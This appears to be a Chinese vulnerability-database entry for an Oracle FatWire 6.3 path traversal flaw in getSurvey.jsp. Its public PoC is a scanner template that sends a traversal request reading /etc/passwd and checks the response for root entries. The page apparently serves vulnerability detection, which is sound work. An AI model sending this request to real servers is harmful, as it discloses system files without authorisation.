oracle-fatwire-lfi: Oracle Fatwire 6.3 - Path Traversal

日期: 2025-09-01 | 影响软件: Oracle Fatwire | POC: 已公开

漏洞描述

Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint. app="Oracle-FatWire-Content-Server"

PoC代码[已公开]

id: oracle-fatwire-lfi

info:
  name: Oracle Fatwire 6.3 - Path Traversal
  author: Bernardo Rodrigues @bernardofsr
  severity: high
  description: |
    Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint.
    app="Oracle-FatWire-Content-Server"
  reference:
    - https://www.exploit-db.com/exploits/50167

rules:
  r0:
    request:
      method: GET
      path: /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐